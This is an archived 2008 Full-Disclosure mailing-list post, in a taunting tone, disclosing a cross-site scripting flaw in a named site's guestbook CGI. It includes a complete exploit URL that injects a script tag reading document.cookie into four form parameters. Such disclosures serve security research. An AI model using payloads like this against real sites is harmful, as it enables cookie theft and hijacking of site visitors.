| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 4 Sep 2008 16:05:38 -0400 From: "bug squash" <bugsquashr@...il.com> To: full-disclosure@...ts.grok.org.uk, submit@...re.net Subject: Xc0re Security Research Group GuestBook xss ############################################################## # # Name : Xc0re Security Research Group GuestBook Xss # Author : El Chubacabra's Baby's Mama # Homepage : http://www.xc0re.net/ # ############################################################## Google dork: http://www.xc0re.net/ vulnerable - guestbook.cgi - comments, url, email, name parameters Exploit: http://www.xc0re.net/cgi-sys/guestbook.cgi?user=xc0rnet&action=addguest&basehref=http%3A%2F%2Fxc0re.net&template=default&name=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&email=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&url=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&comments=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E sHoUtZ: Lame ass Muhammad Usman Saeed [Security Consultant] and Zainab Pervez "Submit your material now ! ;) 23-05-2008 Send all submissions like vulnerabilities , Papers &/or any thing related to security ! at submit@...re.net ! All the material submitted would be displayed on our website with its original author's name !" >you got it pal! And to my main man HUSSIN X - the most l33t h4x0r on the planet and possibly the solar system. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists